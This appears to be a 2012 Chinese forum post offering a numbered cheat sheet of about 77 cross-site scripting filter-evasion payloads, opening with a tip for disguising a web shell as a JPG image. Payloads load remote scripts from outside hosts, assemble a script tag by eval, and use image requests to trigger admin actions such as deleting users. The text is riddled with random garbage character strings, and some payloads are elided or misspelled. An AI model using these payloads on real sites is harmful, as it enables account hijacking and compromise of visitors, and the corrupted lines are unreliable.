跨站图片shell8 m! _3 t7 H+ _1 w# {$ C
XSS跨站代码 <script>alert("")</script>
1 s8 ?* b% J x! Z$ t$ ^7 c0 t" z* a9 b; P$ X/ ?* n: G& w3 h
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马3 C! G- p" N) ]4 i) i
3 `8 [ u1 q3 R9 `) i1 ~
, L/ n0 r: ^3 f0 O) G' K P2 p$ V0 K/ ]+ T8 U+ E5 R# m. i
1)普通的XSS JavaScript注入$ Z! C* ?9 d6 O% J; x) |' o- _/ Q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 I b% s D6 r+ U
& @# |) _( ~' G: a(2)IMG标签XSS使用JavaScript命令$ k$ e1 y+ G. T8 ?: @+ r
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ U# w+ y; E2 X9 M, x/ R' c. C2 t, X
(3)IMG标签无分号无引号# V" P* G3 s6 c- {0 a7 z9 u
<IMG SRC=javascript:alert(‘XSS’)>
" @+ H0 R8 Y, u# e2 h% \ V( G8 [* I
" E+ ]$ o" V$ Q(4)IMG标签大小写不敏感
- J. v) \: U$ W. ~0 X<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
6 I9 A$ \; i4 W' E. w* O. V/ a) q( `" ^
(5)HTML编码(必须有分号)& R. J9 c, T& A% ^, }0 {: v
<IMG SRC=javascript:alert(“XSS”)>1 A9 g# i$ H0 E' k
! V( K$ O/ b7 j(6)修正缺陷IMG标签
7 Q4 k' b' F& `( V<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
8 T! Y; l2 Y/ {- C& f$ K: X- P" ]9 m' I* p
(7)formCharCode标签(计算器)5 o9 _( f7 v% t% q
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) a6 _+ o2 j9 c* |( k2 @
+ [( T$ V: j- N" V( X0 M, c% B(8)UTF-8的Unicode编码(计算器)6 f" D4 F7 m4 f/ B W% L
<IMG SRC=jav..省略..S')>2 e' G& S. v. i( {) g
0 v) A4 ]( T4 i' ?+ u. @(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
/ U$ i. \" L. R& ]<IMG SRC=jav..省略..S')>) m5 b' ?" K; o8 I
7 q* G+ G% ?4 f. ~: w) @(10)十六进制编码也是没有分号(计算器)4 J1 p6 v3 a8 L5 X2 }
<IMG SRC=java..省略..XSS')>
8 {; e- O7 v: g9 A7 n9 C! w/ u# v& O
(11)嵌入式标签,将Javascript分开
# V4 l* `% E( z<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ T) c$ u% d& _& Y0 T% G& X, T* h7 z0 ~. U, Q8 P, Q5 k) d
(12)嵌入式编码标签,将Javascript分开/ L- J5 W6 ?: g/ y1 J. A
<IMG SRC=”jav ascript:alert(‘XSS’);”>+ @$ J1 U1 ^& m* t* B% I6 T
4 I& I" k9 U; P# G( F
(13)嵌入式换行符
+ m% m u( k& Q+ |7 C: Q. I5 D<IMG SRC=”jav ascript:alert(‘XSS’);”>0 R; n3 X, r- {* k
/ B9 w1 W/ D2 _9 E1 ~(14)嵌入式回车
, C6 G5 U4 q9 e$ D- D$ v% k h<IMG SRC=”jav ascript:alert(‘XSS’);”>
& P- ?5 I# P& H+ Z. a9 ]
6 t0 P2 ?5 Z$ ^6 e. ]% k2 v(15)嵌入式多行注入JavaScript,这是XSS极端的例子
3 K' S& c- H. s9 ~+ \. \* q<IMG SRC=”javascript:alert(‘XSS‘)”>
! L) }: p: R+ G# Z* H5 |
- e. i. [1 q0 z+ H- ~* m(16)解决限制字符(要求同页面)
% S* d" n; \4 x1 ?% p<script>z=’document.’</script>, _$ w" s0 b; B" I' T
<script>z=z+’write(“‘</script>- g& K8 d( y4 P# `2 t' X% F
<script>z=z+’<script’</script>2 ?! }. a7 e( d8 k6 J
<script>z=z+’ src=ht’</script>
2 \+ p J. B8 L8 i4 e q* t<script>z=z+’tp://ww’</script>( [5 U+ K) M' v, f7 S5 J" ]
<script>z=z+’w.shell’</script>! B# T! f+ z3 U o
<script>z=z+’.net/1.’</script>
+ I4 A, @" h2 c7 z<script>z=z+’js></sc’</script>
7 Y/ j6 E. n! u( z8 t<script>z=z+’ript>”)’</script>
' f+ i3 j+ S& k6 |- h- S* W4 T<script>eval_r(z)</script>
2 D. R3 u5 N+ \
1 N' D# @. h) O' s) e(17)空字符9 u* l6 P# N; f! d
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
: o5 F+ H. _& b, w' u3 J% e0 _, H5 W
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用# D5 U- k8 f. f8 h o
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
' ~( ~! H1 Z# c6 K" j0 l) L! h
" i2 s( c: h: T# y; O(19)Spaces和meta前的IMG标签
7 q: k# L$ L: Q# Q. u2 c# f<IMG SRC=” javascript:alert(‘XSS’);”>
' f4 K) g+ a+ \ A3 V# {
0 G* L' M* U2 X* K(20)Non-alpha-non-digit XSS+ w* u- W. j$ \. t
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
' T3 I l( i6 v1 ]( v7 S
, i9 d% y2 h1 a(21)Non-alpha-non-digit XSS to 2
& B/ q2 d; C% ^/ E( \$ G8 N2 y4 X<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>- Z0 R5 \" N. w5 ?/ g
m/ L; e$ W/ V" G(22)Non-alpha-non-digit XSS to 3
# U4 ?# [' N; `8 ?<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, e8 a8 y( ^# ^7 z6 x7 Z* f
$ D; y8 k* l3 h4 o+ Q8 J(23)双开括号
0 T1 H ^, s& m& D, i<<SCRIPT>alert(“XSS”);//<</SCRIPT>% A6 m* B. R, b! `0 z
6 u) @# @# x# a' O
(24)无结束脚本标记(仅火狐等浏览器)' E6 H+ Z/ w% z9 W, D# ?; W, Q
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
2 ?/ }6 u: U" f
$ H3 R% W6 Q' k! z0 d. w m5 s; {(25)无结束脚本标记21 | b2 [: Z+ F
<SCRIPT SRC=//3w.org/XSS/xss.js>
: Z4 t, e2 }# [' C% n5 J) i4 H, \: C7 k3 n
(26)半开的HTML/JavaScript XSS2 z% L5 g% v6 A' `! P$ ~
<IMG SRC=”javascript:alert(‘XSS’)”; g* x1 s( l& e1 X* i
3 H# g+ T3 c" O, u(27)双开角括号( h4 |/ t: P8 l. Y; g, s) ?
<iframe src=http://3w.org/XSS.html <
# {9 ], g2 R" T7 S( m, o$ {) N. [/ L9 r1 f& I- B
(28)无单引号 双引号 分号
# _% l8 w# U3 a' D1 e6 O) R' A<SCRIPT>a=/XSS/
t6 B$ P p# r4 aalert(a.source)</SCRIPT>
2 E, e$ \# p6 T t K6 w; ^
* _# D- N6 }8 k, X9 D/ U2 |(29)换码过滤的JavaScript
2 O Y$ P: M/ D% s1 H1 D\”;alert(‘XSS’);//8 i3 _. j) e" P" m0 ^ X B( D
7 T2 Q! `6 {% ^7 P9 @- F
(30)结束Title标签5 I9 d1 C' q# D1 l, U
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>) P+ B! C! J) G9 o) [+ v' _
% I% K" C5 w3 ~/ Y/ o( [(31)Input Image7 f8 x6 q; |: A2 r' O& X
<INPUT SRC=”javascript:alert(‘XSS’);”>
- R+ _3 E2 S, o
/ [) }+ n* d8 v(32)BODY Image
5 n: U. J9 l+ n<BODY BACKGROUND=”javascript:alert(‘XSS’)”>% O6 [( Z' F6 ] a% {
( e* f! z0 ?- U
(33)BODY标签/ W; I$ d9 x; q+ o5 U! D! H
<BODY(‘XSS’)>' ?7 C2 a; k7 u. T7 X* G
1 F3 m2 W0 J+ g- ^, G(34)IMG Dynsrc) }' l: I% h. G. T
<IMG DYNSRC=”javascript:alert(‘XSS’)”>, B- h. |$ P* ~2 [) s
; M( Q9 n; L% Z* p' P& A
(35)IMG Lowsrc
5 @: d5 _+ d. F<IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ h$ [1 |( J! p
1 d3 ^% g8 o8 O* B4 m7 M7 h(36)BGSOUND, `3 q: m* F$ m7 P( a. Q
<BGSOUND SRC=”javascript:alert(‘XSS’);”>" \8 j0 U6 ^. a5 k2 i) w; l
3 v& p& O) g3 V' L$ I
(37)STYLE sheet
5 a: _/ B+ L6 O4 J: [<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
J0 R2 y) _; |% Q( W7 L! Q) k1 B9 K' ?
(38)远程样式表 g& R' E% G' z0 {# ~
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
) l- W" g0 X4 [$ j+ F. t7 h! K* o; }% G
(39)List-style-image(列表式)
, b, G0 z" |* {' J) [<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 Q: N2 U; Z% \; F) g; g
$ j5 B3 T+ T# R
(40)IMG VBscript
4 R+ m9 B; l& C6 [) n<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
$ T% _7 g) c9 [2 n. F$ d" z
( ]$ f: [+ F& J(41)META链接url a1 q+ }% u1 E& @
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
% G# f/ n8 V! h* l8 Y, \
+ c; G/ C/ I9 ^/ b1 q. h(42)Iframe* o, h# @& B" T- E/ R/ B
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
: p5 r) T- N8 ^4 A& ^& k(43)Frame" ?, E1 S/ N3 m# D4 r( u( q/ I9 M
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
. A% E8 B% O# h4 y0 X+ P5 R& f* Y
(44)Table
5 |! k3 {; U! Z; ^) z3 `<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>; P; Y; K5 _8 W# K Q# p* c' N( e
. B& o0 C* m' u, q4 F# ?
(45)TD! T3 y/ Y8 f4 ^- o* J% b
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 |- p7 B. g! {5 v
+ o# S3 L% G7 q; ]5 G7 M(46)DIV background-image6 ^4 [$ X! [ U; J6 O: x" M
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 S( ] J( Y2 A! H4 y- d( R
0 H4 F, G3 n3 n(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
0 N) t0 _1 }6 C. u<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
8 K) u& `9 a+ r8 v1 j
1 c) Y# c& i4 Y3 \(48)DIV expression9 Y( s/ A) Z3 h8 H2 b
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 u9 c4 v: E* T, s& M7 V
' q* M( M" U* @(49)STYLE属性分拆表达1 w4 i$ N- X6 W+ n
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
U6 r1 d, `& o" x; P% g7 N) F& U7 U" p
(50)匿名STYLE(组成:开角号和一个字母开头)
* |0 f9 l/ q$ V" R) i<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>" c- b% L' B5 J# p, @( f$ J
; H' W& k8 \1 a' i- c0 B/ x% W Q
(51)STYLE background-image& C3 p+ U T) D
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
3 R* P0 `* Z8 c5 J# u4 H k9 U( U" u/ I( j* w% }
(52)IMG STYLE方式
J; z0 ~% s8 f1 S" Pexppression(alert(“XSS”))’>
% M+ L% e! e9 b8 A7 w- L1 ]( Z- Z/ ^6 S. j: v
(53)STYLE background. B+ T) A3 g6 l1 p
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
0 Q1 U# h; ~8 I5 O; |% B
6 Q1 D0 v% [4 J(54)BASE _* J" r% Q) W Q/ X
<BASE HREF=”javascript:alert(‘XSS’);//”>
& h, l/ [- b$ {4 t1 F/ V$ x [& a P( ?8 n. J" T
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS+ k/ }1 V% `- I4 N
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
0 v9 k$ h; n2 [3 |
Y" r- e) ~3 h7 \3 i2 D(56)在flash中使用ActionScrpt可以混进你XSS的代码
$ t% \) P/ A! `a=”get”;
8 y, q, r4 n! T/ vb=”URL(\”"; L& g9 S) j) d0 X4 d a5 h4 ~
c=”javascript:”;
% n7 _9 n2 f" `, u$ ~: ]- Yd=”alert(‘XSS’);\”)”;) P0 {% m+ y) r$ n7 T
eval_r(a+b+c+d);
! E6 |' t8 g( b" f" w8 e, v/ w
7 j# f3 k: v5 i9 z4 [& }(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上! C2 ]. r; Z+ {6 a. H; U% W
<HTML xmlns:xss>7 J+ o x$ ?- p9 d7 ~3 G, k0 U( e
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
3 B1 X; n3 W0 ]2 S+ c<xss:xss>XSS</xss:xss>( Q# _. @- C' C/ T" x$ t
</HTML>. d ?5 H4 M$ n% t
3 o4 N: U+ F5 D- w6 l
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用4 U) U% x; s7 I a
<SCRIPT SRC=””></SCRIPT>4 j" o, B( Z R- G4 B& Q
6 E( O; m1 j1 |3 y(59)IMG嵌入式命令,可执行任意命令! l$ N* E( T6 K: P: [/ c
<IMG SRC=”http://www.XXX.com/a.php?a=b”>0 C e" C# A& ^' F$ B( Z. e
) J- C2 J7 z1 w; [' ~) Q* ~
(60)IMG嵌入式命令(a.jpg在同服务器)
9 {7 c% `0 j: cRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
' S+ o; k$ Y3 C. }* ?. C9 Q% d% Z6 T- U
(61)绕符号过滤7 w: O5 s7 p. `1 n2 X: `0 [* e
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>. {6 }1 g$ A# W4 ~" \3 c* {
- f$ I5 F, {& U
(62) y$ d; m: v0 A9 z" ]2 b$ g R
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 X7 A0 v2 k7 \' {" K6 C, x! d+ C
* S) U, X2 C6 |' k) x
(63)
, s3 r* [ h8 G f<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! w; ~8 C8 q% m" j1 o: T' p8 c2 P, B
* Y |* z0 L5 Z" w* M(64)& Y9 p3 Z) J- z) Q% ]% l# [9 B
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 M; m) P" m$ ?/ K; X% Q6 |
+ e7 v$ u+ P' G: d+ a) U(65). z: ^+ ^3 Q" c8 s# r7 U
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
; Q! a3 N: f4 o C. q# R% ]6 W) S% A; a, h, A
(66)
* N$ ]1 M! @' Q<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>5 B, Z8 F9 X; S# W
. [) @$ v4 D5 r g5 z(67)( i9 M. C" l6 c( U
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
! {+ }) ~2 ]4 W* V' p( h7 a! z: c) T! a- m, g" O' A& F
(68)URL绕行& B2 V3 d- {6 M' e( {2 c1 j
<A HREF=”http://127.0.0.1/”>XSS</A>
8 j. s9 [" K6 _% g% C3 Y% Z: @, Q" c, J4 c
(69)URL编码
$ N& d( a9 K# k7 `6 l/ f% I<A HREF=”http://3w.org”>XSS</A>
) a5 E8 ~' K1 C: c
' M P+ F+ T* e! B3 `8 e5 Q(70)IP十进制, U' W# c0 S& n
<A HREF=”http://3232235521″>XSS</A>% c1 U+ i2 ], m" H+ G! L7 @
* B# a) T: U. c9 E2 ^(71)IP十六进制% `. P' r2 [: ~- t5 v0 @
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
* `" m# S8 C$ ~, Y
6 C \7 F0 Y, P: ~! Z+ G5 D(72)IP八进制
5 w" ?/ U( I0 {9 ^, L( i+ x<A HREF=”http://0300.0250.0000.0001″>XSS</A>
2 o3 |' D5 H. F. Z
; L! _# p6 I% A(73)混合编码
# p# a- l/ j- N<A HREF=”h
& S9 t4 b2 Y- `. F1 K0 Ptt p://6 6.000146.0×7.147/”">XSS</A>2 M0 m, Z' b$ T5 r: ~$ p6 d- z# h. _
! _- ?( O6 |& s8 h
(74)节省[http:]
5 f/ R1 F! R u% b8 `- E<A HREF=”//www.google.com/”>XSS</A>
4 O' G/ D5 o4 l: j0 h4 c2 t! X8 f6 r% G
0 Y2 w/ I8 e4 n(75)节省[www]
/ j% `2 }% P) H<A HREF=”http://google.com/”>XSS</A>
- e+ f: t, v7 U: X- b. g+ }) ?4 D9 h6 Q
(76)绝对点绝对DNS
6 w9 k6 Y: w' d+ K& E; T7 s% w<A HREF=”http://www.google.com./”>XSS</A>4 k( v+ @2 v. B6 S- A% X0 Z/ I$ `
1 I' k" I7 q9 R0 f
(77)javascript链接$ u0 E% n# Q! O9 |' f# }1 w
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>5 X, N: d- d/ a# E; o$ u
|
发表于 2012-9-13 17:04:56
收藏
支持
反对